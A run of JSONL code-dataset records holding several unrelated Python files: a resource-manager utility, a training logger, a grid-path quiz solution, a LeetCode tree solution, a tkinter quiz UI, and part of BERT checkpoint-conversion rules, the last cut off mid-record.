\"user\"), value is the instantiated\n # object, if any (the object will be instantiated if we are within the\n # \"with\"-context, for example.\n self._resource_registry = {}\n # resource managers (those which ensure \"start\" and \"stop\" functionality)\n # actually, it's a dict which contains unfinished generators.\n # key is the resource name, value is the generator instance\n # Instances are added to this dict, when a xxx_mgr.start()/xxx_mgr.stop()\n # methods are used.\n self._resource_managers = {}\n\n def _active_resource_makers(self):\n \"\"\"\n Return the subset of _resource_makers.keys() registered with \"register_mod\"\n \"\"\"\n ret = set()\n for key, value in _resource_makers.items():\n if value['func'].__module__ in self._modules:\n ret.add(key)\n return ret\n\n @property\n def __members__(self):\n return self._resource_registry.keys()\n\n @property\n def __methods__(self):\n keys = self._active_resource_makers()\n ctx_keys = ['%s_ctx' % key for key in keys]\n mgr_keys = ['%s_mgr' % key for key in keys]\n return ctx_keys + mgr_keys\n\n def register_mod(self, module_name):\n \"\"\"\n Find and register all resources in the module with a given name\n :param module_name: string with a module name\n \"\"\"\n self._modules.add(module_name)\n mod = __import__(module_name)\n\n def unregister_mod(self, module_name):\n \"\"\"\n Unregister a module, make resources from the module unavailable.\n :param module_name: string with a module name\n \"\"\"\n self._modules.remove(module_name)\n\n def register_func(self, func):\n \"\"\"\n Decorator to register function as a resource\n \"\"\"\n # todo: copy-paste of the global function\n # kept within object for convenience and backward compatibility\n resource_id = func.__name__\n _resource_makers[resource_id] = {'func': func}\n return func\n\n def __getattr__(self, item):\n if item.endswith('_ctx'):\n try:\n return self._get_decorator_and_context_manager(item[:-4])\n except RuntimeError as e:\n raise AttributeError(str(e))\n elif item.endswith('_mgr'):\n try:\n return self._get_manager(item[:-4])\n except RuntimeError as e:\n raise AttributeError(str(e))\n else:\n try:\n return self._resource_registry[item]\n except KeyError as e:\n raise AttributeError(str(e))\n\n def __getitem__(self, item):\n try:\n return getattr(self, item)\n except AttributeError as e:\n raise KeyError(str(e))\n\n def _get_decorator_and_context_manager(self, resource_id):\n\n if resource_id not in self._active_resource_makers():\n raise RuntimeError(\"Don't know how to create resource %s\" % resource_id)\n resource_maker = _resource_makers[resource_id]['func']\n\n class DecoratorAndContextManager(object):\n\n def __init__(mgr, *args, **kwargs):\n # args and kwargs are function args and kwargs...\n mgr.name = kwargs.pop('_name', resource_id)\n mgr.args = args\n mgr.kwargs = kwargs\n\n def __enter__(mgr):\n mgr.generator = resource_maker(*mgr.args, **mgr.kwargs)\n resource = next(mgr.generator)\n self._resource_registry[mgr.name] = resource\n return resource\n\n def __exit__(mgr, exc_type, exc_val, exc_tb):\n next(mgr.generator, None)\n self._resource_registry.pop(mgr.name, None)\n\n def __call__(deco, callable):\n\n def wrapper(*args, **kwargs):\n generator = resource_maker(*deco.args, **deco.kwargs)\n resource = next(generator)\n self._resource_registry[deco.name] = resource\n new_args = [resource, ]\n new_args += list(args)\n ret = callable(*new_args, **kwargs)\n next(generator, None)\n self._resource_registry.pop(deco.name, None)\n return ret\n\n # actually, if you 
don't use py.test which tries to introspect\n                # the function signature, it's enough to\n                # add the @wraps(callable) decorator to the wrapper and then return it\n                # But as we need to \"mock\" the function signature too,\n                # we're forced to do the trick.\n                # See http://emptysquare.net/blog/copying-a-python-functions-signature/\n                # and http://www.python.org/dev/peps/pep-0362/#boundarguments-object\n\n                argspec = inspect.getargspec(callable)\n\n                try:\n                    argspec.args.pop(0)\n                except IndexError as e:\n                    pass\n\n                formatted_args = inspect.formatargspec(*argspec).lstrip('(').rstrip(')')\n                fndef = 'lambda %s: wrapper(%s)' % (formatted_args, formatted_args)\n                fake_fn = eval(fndef, {'wrapper': wrapper})\n                return wraps(callable)(fake_fn)\n\n        return DecoratorAndContextManager\n\n    def _get_manager(self, resource_id):\n\n        if resource_id in self._resource_managers:\n            return self._resource_managers[resource_id]\n\n        if resource_id not in self._active_resource_makers():\n            raise RuntimeError(\"Don't know how to create resource %s\" % resource_id)\n        resource_maker = _resource_makers[resource_id]['func']\n        resource_manager = ResourceManager(self, resource_id, resource_maker)\n        self._resource_managers[resource_id] = resource_manager\n\n        return resource_manager\n\n    # some helper functions\n\n    def pdb(self):\n        try:\n            import ipdb\n        except ImportError:\n            import pdb as ipdb\n        ipdb.set_trace()\n\n    def shell(self, namespace=None):\n        try:\n            from IPython import embed\n        except ImportError:\n            import code\n            import readline\n            import rlcompleter\n            # we must pass at least something in here\n            if namespace is None:\n                namespace = {'resources': resources}\n            code.InteractiveConsole(namespace).interact()\n        else:\n            embed()\n\n\nclass ResourceManager(object):\n\n    def __init__(self, resource_collection_manager, resource_id, resource_maker):\n        self.resource_collection_manager = resource_collection_manager\n        self.resource_id = resource_id\n        self.resource_maker = resource_maker\n        self.generators = {}\n\n    def start(self, *args, **kwargs):\n        name = kwargs.pop('_name', self.resource_id)\n        if name in self.resource_collection_manager._resource_registry:\n            raise RuntimeError('Resource with name %r has been already started' % name)\n\n        generator = self.resource_maker(*args, **kwargs)\n        resource = next(generator)\n        self.generators[name] = generator\n        self.resource_collection_manager._resource_registry[name] = resource\n        return resource\n\n    def stop(self, _name=None):\n        name = _name or self.resource_id\n        try:\n            generator = self.generators[name]\n        except KeyError:\n            raise RuntimeError('Resource %r has not been started' % name)\n        next(generator, None)\n        self.generators.pop(name, None)\n        self.resource_collection_manager._resource_registry.pop(name, None)\n\n\nresources = ResourceCollectionManager()\n","repo_name":"Doist/resources","sub_path":"resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":8447,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"6480295428","text":"import numpy as np\nimport pandas as pd\nimport os\nimport pickle\n\nclass Logger():\n\n    def __init__(self, columns, modes, epoch=0, idx=0, rootpath=None, verbose=True):\n\n        self.columns=columns\n        self.mode=modes[0]\n        self.epoch=epoch\n        self.idx = idx\n        self.data = pd.DataFrame(columns=[\"epoch\",\"iteration\",\"mode\"]+self.columns)\n        self.stored_arrays = dict()\n        self.rootpath=rootpath\n        self.verbose = verbose\n\n    def resume(self, data):\n        self.data = data\n        self.idx = data.index[-1]\n        self.epoch = 
data[\"epoch\"].max()\n\n def update_epoch(self, epoch=None):\n if epoch is None:\n self.epoch+=1\n else:\n self.epoch=epoch\n\n def set_mode(self,mode):\n self.mode = mode\n\n def log(self, stats, epoch):\n\n clean_stats = dict()\n for k,v in stats.items():\n if np.array(v).size == 1:\n clean_stats[k] = v\n else:\n self.log_array(name=k,array=v, epoch=epoch)\n\n self.log_numbers(clean_stats, epoch)\n\n def log_array(self, name, array, epoch):\n\n if name not in self.stored_arrays.keys():\n self.stored_arrays[name] = list()\n\n self.stored_arrays[name].append((epoch, array))\n\n def log_numbers(self, stats, epoch):\n\n stats[\"epoch\"] = epoch\n stats[\"mode\"] = self.mode\n\n row = pd.DataFrame(stats, index=[self.idx])\n\n self.data = self.data.append(row, sort=False)\n self.idx +=1\n\n def get_data(self):\n return self.data\n\n def save(self):\n\n path = os.path.join(self.rootpath,\"npy\")\n #pickle.dump(self, open( path + \"/logger.pkl\", \"wb\" ))\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n arrayfile = \"{name}_{epoch}.npy\"\n csvfile = \"data.csv\"\n\n for k,v in self.stored_arrays.items():\n for epoch, data in v:\n filepath = os.path.join(path,arrayfile.format(epoch=epoch, name=k))\n np.save(filepath, data)\n if self.verbose: print(\"saving \"+filepath)\n\n self.data.to_csv(os.path.join(self.rootpath,csvfile))\n","repo_name":"MarcCoru/crop-type-mapping","sub_path":"src/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"77"} +{"seq_id":"6453164019","text":"# Randomly fills a grid of size 7 x 7 with NE, SE, SW, NW,\n# meant to represent North-East, South-East, North-West, South-West,\n# respectively, and starting from the cell in the middle of the grid,\n# determines, for each of the 4 corners of the grid, the preferred path amongst\n# the shortest paths that reach that corner, if any. 
At a given cell, it is possible to move\n# according to any of the 3 directions indicated by the value of the cell;\n# e.g., from a cell storing NE, it is possible to move North-East, East, or North.\n# At any given point, one prefers to move diagonally, then horizontally,\n# and vertically as a last resort.\n#\n# Written by *** and Eric Martin for COMP9021\n\n\nimport sys\nfrom random import seed, choice\nfrom array_queue import *\n\ndef display_grid():\n for i in range(dim):\n print(' ', end = '')\n for j in range(dim):\n print(' ', grid[i][j], end = '')\n print()\n print()\n\ndef preferred_paths_to_corners():\n direction = {'NE': ((1, -1), (1, 0), (0, -1)),\n 'SE': ((1, 1), (1, 0), (0, 1)),\n 'SW': ((-1, 1), (-1, 0), (0, 1)),\n 'NW': ((-1, -1), (-1, 0), (0, -1))}\n route = ArrayQueue()\n preferred_paths = {}\n route.enqueue([(size, size)])\n while not route.is_empty():\n way = route.dequeue()\n x, y = way[-1]\n if (x, y) in corners:\n if (x, y) not in preferred_paths:\n preferred_paths[(x, y)] = way\n continue\n for stepx, stepy in direction[grid[y][x]]:\n if (x + stepx, y + stepy) not in way:\n if x + stepx >= 0 and x + stepx < dim:\n if y + stepy >= 0 and y + stepy < dim:\n path = list(way)\n path.append((x + stepx, y + stepy))\n route.enqueue(path)\n else:\n continue\n else:\n continue\n else:\n continue\n\n return preferred_paths\n\n\ntry:\n seed_arg = int(input('Enter an integer: '))\nexcept ValueError:\n print('Incorrect input, giving up.')\n sys.exit()\n \nseed(seed_arg)\nsize = 3\ndim = 2 * size + 1\ngrid = [[0] * dim for _ in range(dim)]\ndirections = 'NE', 'SE', 'SW', 'NW'\n\nfor i in range(dim):\n for j in range(dim):\n grid[i][j] = choice(directions)\nprint('Here is the grid that has been generated:')\ndisplay_grid()\n\ncorners = (0, 0), (dim - 1, 0), (dim - 1, dim - 1), (0, dim - 1)\npaths = preferred_paths_to_corners()\nif not paths:\n print('There is no path to any corner')\n sys.exit()\nfor corner in corners:\n if corner not in paths:\n print(f'There is no path to {corner}')\n else:\n print(f'The preferred path to {corner} is:')\n print(' ', paths[corner])\n","repo_name":"zzzz2000zzzz/COMP9021","sub_path":"quiz/quiz08/quiz_8.py","file_name":"quiz_8.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71572815289","text":"#\n# @lc app=leetcode id=515 lang=python3\n#\n# [515] Find Largest Value in Each Tree Row\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def largestValues(self, root: TreeNode) -> List[int]:\n result = []\n def calculate(root, depth):\n if not root:\n return\n nonlocal result\n if len(result) <= depth:\n result.append(root.val)\n else:\n previous = result[depth]\n if previous < root.val:\n result[depth] = root.val\n calculate(root.left, depth + 1)\n calculate(root.right, depth + 1)\n calculate(root, 0)\n return result\n \n# @lc code=end\n\n","repo_name":"Elenionl/LeetCode","sub_path":"515.find-largest-value-in-each-tree-row.py","file_name":"515.find-largest-value-in-each-tree-row.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5831252272","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\n\nTHEME_COLOR = \"#375362\"\n\nclass QuizUserInterface:\n \n def __init__(self, quiz_brain: QuizBrain):\n 
self.quiz = quiz_brain\n \n self.window = Tk()\n self.window.title(\"My Quiz\")\n self.window.config(padx=20, pady=20, bg=THEME_COLOR)\n \n self.score_label = Label(text=\"Score: 0\", fg=\"white\", bg=THEME_COLOR)\n self.score_label.grid(row=0, column=1)\n \n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.question_text = self.canvas.create_text(\n 150, \n 125,\n width=280 ,\n text=\"Testing Text\", \n fill=THEME_COLOR, \n font=(\"Arial\", 20, \"italic\")\n )\n self.canvas.grid(row=1, column=0, columnspan=2, pady=50)\n \n correct_image = PhotoImage(file=\"images/true.png\")\n self.correct_button = Button(image=correct_image, highlightthickness=0, command=self.correct_button_click)\n self.correct_button.grid(row=2, column=0)\n \n wrong_image = PhotoImage(file=\"images/false.png\")\n self.wrong_button = Button(image=wrong_image, highlightthickness=0, command=self.wrong_button_click)\n self.wrong_button.grid(row=2, column=1)\n \n self.get_next_question()\n \n self.window.mainloop()\n \n \n def get_next_question(self):\n self.canvas.config(bg=\"white\")\n if self.quiz.still_has_questions(): \n self.score_label.config(text=f\"Score: {self.quiz.score}\")\n question_text = self.quiz.next_question() \n self.canvas.itemconfig(self.question_text, text=question_text)\n else:\n self.canvas.itemconfig(self.question_text, text=f\"You have finished the Quiz your score is: {self.quiz.score}\")\n self.wrong_button.config(state=\"disable\")\n self.correct_button.config(state=\"disable\")\n\n def correct_button_click(self):\n self.user_answer = self.quiz.check_answer(\"True\")\n self.user_feedback(self.user_answer)\n \n def wrong_button_click(self):\n self.user_answer = self.quiz.check_answer(\"False\")\n self.user_feedback(self.user_answer)\n \n def change_canvas_color(self, user_answer):\n if user_answer == True:\n self.canvas.config(bg=\"green\") \n else:\n self.canvas.config(bg=\"red\")\n \n def user_feedback(self, user_answer):\n self.change_canvas_color(user_answer)\n self.window.after(1000, self.get_next_question)\n \n ","repo_name":"sifisKoen/Pi-Playground","sub_path":"Quiz Game + UI/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20868185384","text":"import logging\nimport re\nfrom typing import Tuple\n\nimport torch\n\nfrom modelzoo.common.pytorch.model_utils.checkpoint_converters.base_converter import (\n BaseCheckpointConverter_HF_CS,\n BaseCheckpointConverter_PT_PT,\n BaseConfigConverter,\n BaseConfigConverter_CS_CS,\n BaseConfigConverter_HF_CS,\n ConfigConversionError,\n ConversionRule,\n EquivalentSubkey,\n FormatVersions,\n)\n\n\nclass Converter_BertLayerNorm_HF_CS(BaseCheckpointConverter_HF_CS):\n def __init__(self, hf_name, cs_name):\n super().__init__()\n self.rules = [\n # torch.nn.LayerNorm has .weight & .bias properties\n ConversionRule(\n [EquivalentSubkey(hf_name, cs_name), \"\\.(?:weight|bias)\",],\n action=self.replaceKey,\n ),\n # Old HF implementation uses .gamma instead of .weight\n ConversionRule(\n [\n EquivalentSubkey(hf_name, cs_name),\n EquivalentSubkey(\".gamma\", \".weight\"),\n ],\n action=self.replaceKey,\n ),\n # Old HF implementation uses .beta instead of .bias\n ConversionRule(\n [\n EquivalentSubkey(hf_name, cs_name),\n EquivalentSubkey(\".beta\", \".bias\"),\n ],\n action=self.replaceKey,\n ),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), 
FormatVersions(\"cs\"))\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return None\n\n\nclass Converter_BertModel_CS16_CS17(BaseCheckpointConverter_PT_PT):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Embedding:\n ConversionRule(\n [\n EquivalentSubkey(\"embeddings\", \"embedding_layer\"),\n \"\\.word_embeddings\\.weight\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\"embeddings\", \"embedding_layer\"),\n \"\\.position_embeddings\\.weight\",\n ],\n action=self.position_embeddings_convert,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"embeddings.token_type_embeddings\",\n \"embedding_layer.segment_embeddings\",\n ),\n \"\\.weight\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule([\"embeddings\\.position_ids\",], exists=\"left\",),\n ConversionRule(\n [\n EquivalentSubkey(\"embeddings.\", \"\"),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"embed_ln_f\"),\n ],\n action=None,\n ),\n # Encoder Layers:\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.self.query\", \"self_attn.proj_q_dense_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.self.key\", \"self_attn.proj_k_dense_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.self.value\", \"self_attn.proj_v_dense_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"attention.output.dense\",\n \"self_attn.proj_output_dense_layer\",\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\"attention.output.\", \"\"),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"norm1\"),\n ],\n action=None,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\n \"intermediate.dense\", \"ffn.ffn.0.linear_layer\"\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\"output.dense\", \"ffn.ffn.1.linear_layer\"),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"encoder.layer\", \"transformer_encoder.layers\",\n ),\n \"\\.\\d+\\.\",\n EquivalentSubkey(\"output.\", \"\"),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"norm2\"),\n ],\n action=None,\n ),\n # Head:\n ConversionRule(\n [\n \"pooler\\.\",\n EquivalentSubkey(\"dense\", \"pooler.ffn.0.linear_layer\"),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ]\n\n def position_embeddings_convert(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n self.replaceKey(\n old_key, new_key, old_state_dict, new_state_dict, from_index\n )\n if from_index == 1:\n # HF stores an register buffer with 
position_ids\n            position_id_key = re.sub(\n                \"\\.position_embeddings\\.weight\", \".position_ids\", new_key\n            )\n            max_position_embeddings = action_fn_args[\"configs\"][1][\"model\"][\n                \"max_position_embeddings\"\n            ]\n            new_state_dict[position_id_key] = torch.arange(\n                max_position_embeddings\n            ).expand((1, -1))\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.7\"))\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_CS16_CS17\n\n\nclass ConfigConverter_Bert_CS16_CS17(BaseConfigConverter_CS_CS):\n    def __init__(self):\n        super().__init__()\n        # Config didn't change between 1.6 and 1.7. Copy all keys.\n        self.rules = [\n            ConversionRule([\".*\"], action=self.replaceKey),\n        ]\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.7\"))\n\n\nclass Converter_BertModel_CS16_CS18(BaseCheckpointConverter_PT_PT):\n    def __init__(self):\n        super().__init__()\n        self.rules = [\n            # Catch checkpoints from PyTorch 2.0 API\n            ConversionRule([Converter_BertModel_CS16_CS17(),], action=None,),\n            # Catch checkpoints from deprecated PyTorchBaseModel\n            ConversionRule(\n                [\n                    EquivalentSubkey(\"\", \"model.\"),\n                    Converter_BertModel_CS16_CS17(),\n                ],\n                action=None,\n            ),\n        ]\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_CS16_CS18\n\n\nclass ConfigConverter_Bert_CS16_CS18(ConfigConverter_Bert_CS16_CS17):\n    def __init__(self):\n        super().__init__()\n\n    def pre_config_convert(\n        self, config, from_index,\n    ):\n        config = super().pre_config_convert(config, from_index)\n        if from_index == 1:\n            if (\n                \"pooler_nonlinearity\" in config\n                and config[\"pooler_nonlinearity\"]\n                != config[\"encoder_nonlinearity\"]\n            ):\n                raise ConfigConversionError(\n                    \"pooler_nonlinearity was introduced in CS 1.8. Prior to that, the pooler nonlinearity must be the same as encoder_nonlinearity\"\n                )\n            if \"mlm_nonlinearity\" in config:\n                if config[\"mlm_nonlinearity\"] != \"gelu\":\n                    raise ConfigConversionError(\n                        \"mlm_nonlinearity was introduced in CS 1.8. Prior to that, the mlm nonlinearity must be gelu\"\n                    )\n            else:\n                if config[\"encoder_nonlinearity\"] != \"gelu\":\n                    raise ConfigConversionError(\n                        \"mlm_nonlinearity was introduced in CS 1.8. Prior to that, the mlm nonlinearity must be gelu. However, the input config has an mlm_nonlinearity which defaults to encoder_nonlinearity = {}\".format(\n                            config[\"encoder_nonlinearity\"]\n                        )\n                    )\n        return config\n\n    def post_config_convert(\n        self,\n        original_config,\n        old_config,\n        new_config,\n        from_index,\n        drop_unmatched_keys,\n    ):\n        if from_index == 0:\n            new_config[\"pooler_nonlinearity\"] = new_config[\n                \"encoder_nonlinearity\"\n            ]\n            new_config[\"mlm_nonlinearity\"] = \"gelu\"\n\n        return super().post_config_convert(\n            original_config,\n            old_config,\n            new_config,\n            from_index,\n            drop_unmatched_keys,\n        )\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n\nclass Converter_Bert_CS17_CS18(BaseCheckpointConverter_PT_PT):\n    def __init__(self):\n        super().__init__()\n        # Checkpoint didn't change between 1.7 and 1.8. 
Copy all keys.\n        self.rules = [\n            ConversionRule([\".*\"], action=self.replaceKey),\n        ]\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.7\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n    @classmethod\n    def converter_note(cls) -> str:\n        return (\n            \"BertForPreTraining, BertForSequenceClassification, \"\n            \"BertForQuestionAnswering, and BertForSummarization classes\"\n        )\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_CS17_CS18\n\n\nclass ConfigConverter_Bert_CS17_CS18(ConfigConverter_Bert_CS16_CS18):\n    def __init__(self):\n        # Config didn't change between 1.6 and 1.7. Therefore 1.7 <-> 1.8\n        # converter is equivalent to 1.6 <-> 1.8 converter.\n        super().__init__()\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.7\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n\nclass Converter_BertModel_HF_CS17(\n    Converter_BertModel_CS16_CS17, BaseCheckpointConverter_HF_CS\n):\n    def __init__(self):\n        super().__init__()\n\n    def pre_model_convert(\n        self,\n        old_state_dict,\n        new_state_dict,\n        configs,\n        from_index,\n        drop_unmatched_keys,\n    ):\n        # Manually tie weights\n        if from_index == 1 and configs[1][\"model\"][\"share_embedding_weights\"]:\n            if (\n                old_state_dict.get(\n                    \"bert_encoder.embedding_layer.word_embeddings.weight\", 0\n                )\n                is None\n            ):\n                old_state_dict[\n                    \"bert_encoder.embedding_layer.word_embeddings.weight\"\n                ] = old_state_dict[\n                    \"bert_mlm_head.classifier.ffn.0.linear_layer.weight\"\n                ]\n\n    def post_checkpoint_convert(\n        self, checkpoint, from_index: int,\n    ):\n        return BaseCheckpointConverter_HF_CS.post_checkpoint_convert(\n            self, checkpoint, from_index\n        )\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.7\"))\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_HF_CS17\n\n\nclass Converter_BertModel_HF_CS18(BaseCheckpointConverter_HF_CS):\n    def __init__(self):\n        super().__init__()\n        self.rules = [\n            # Catch checkpoints from PyTorch 2.0 API\n            ConversionRule([Converter_BertModel_HF_CS17(),], action=None,),\n            # Catch checkpoints from deprecated PyTorchBaseModel\n            ConversionRule(\n                [EquivalentSubkey(\"\", \"model.\"), Converter_BertModel_HF_CS17()],\n                action=None,\n            ),\n        ]\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_HF_CS17\n\n\nclass Converter_BertPretrainModel_CS16_CS17(BaseCheckpointConverter_PT_PT):\n    def __init__(self):\n        super().__init__()\n        self.rules = [\n            ConversionRule(\n                [\n                    EquivalentSubkey(\"bert.\", \"bert_encoder.\"),\n                    Converter_BertModel_CS16_CS17(),\n                ],\n            ),\n            # CLS:\n            ConversionRule(\n                [\n                    EquivalentSubkey(\n                        \"cls.predictions.transform.dense\",\n                        \"bert_mlm_head.mlm_transform.ffn.ffn.0.linear_layer\",\n                    ),\n                    \"\\.(?:weight|bias)\",\n                ],\n                action=self.replaceKey,\n            ),\n            ConversionRule(\n                [\n                    EquivalentSubkey(\n                        \"cls.predictions.transform.\",\n                        \"bert_mlm_head.mlm_transform.\",\n                    ),\n                    Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"ln\"),\n                ],\n                action=None,\n            ),\n            ConversionRule(\n                [\n                    EquivalentSubkey(\n                        \"cls.predictions.decoder\",\n                        \"bert_mlm_head.classifier.ffn.0.linear_layer\",\n                    ),\n                    \"\\.weight\",\n                ],\n                action=self.replaceKey,\n            ),\n            
ConversionRule(\n                [\n                    EquivalentSubkey(\n                        \"cls.predictions.decoder\",\n                        \"bert_mlm_head.classifier.ffn.0.linear_layer\",\n                    ),\n                    \"\\.bias\",\n                ],\n                action=self.convert_cls_predictions_bias,\n            ),\n            ConversionRule([\"cls\\.predictions\\.bias\"], exists=\"left\"),\n            ConversionRule(\n                [\n                    EquivalentSubkey(\n                        \"cls.seq_relationship\",\n                        \"bert_cls_head.classifier.ffn.0.linear_layer\",\n                    ),\n                    \"\\.(?:weight|bias)\",\n                ],\n                action=self.replaceKey,\n            ),\n        ]\n\n    def convert_cls_predictions_bias(\n        self,\n        old_key,\n        new_key,\n        old_state_dict,\n        new_state_dict,\n        from_index,\n        action_fn_args,\n    ):\n        self.replaceKey(\n            old_key,\n            new_key,\n            old_state_dict,\n            new_state_dict,\n            from_index,\n            action_fn_args,\n        )\n        if from_index == 1:\n            # HF stores an extra copy of the decoder bias in the predictions object itself\n            bias_key = re.sub(\"\\.decoder\\.\", \".\", new_key)\n            self.replaceKey(\n                old_key,\n                bias_key,\n                old_state_dict,\n                new_state_dict,\n                from_index,\n                action_fn_args,\n            )\n\n    def post_checkpoint_convert(\n        self, checkpoint, from_index: int,\n    ):\n        logging.warning(\n            \"The Bert model changed significantly between {} and {}. As a result, the\"\n            \" optimizer state won't be included in the converted checkpoint.\".format(\n                *self.formats()\n            )\n        )\n        return {\"model\": checkpoint[\"model\"]}\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.7\"))\n\n    @classmethod\n    def converter_note(cls) -> str:\n        return \"BertPretrainModel class\"\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_CS16_CS17\n\n\nclass Converter_BertPretrainModel_CS16_CS18(BaseCheckpointConverter_PT_PT):\n    def __init__(self):\n        super().__init__()\n        self.rules = [\n            # Catch checkpoints from PyTorch 2.0 API\n            ConversionRule(\n                [Converter_BertPretrainModel_CS16_CS17(),], action=None,\n            ),\n            # Catch checkpoints from deprecated PyTorchBaseModel\n            ConversionRule(\n                [\n                    EquivalentSubkey(\"\", \"model.\"),\n                    Converter_BertPretrainModel_CS16_CS17(),\n                ],\n                action=None,\n            ),\n        ]\n\n    def post_checkpoint_convert(\n        self, checkpoint, from_index: int,\n    ):\n        logging.warning(\n            \"The Bert model changed significantly between {} and {}. 
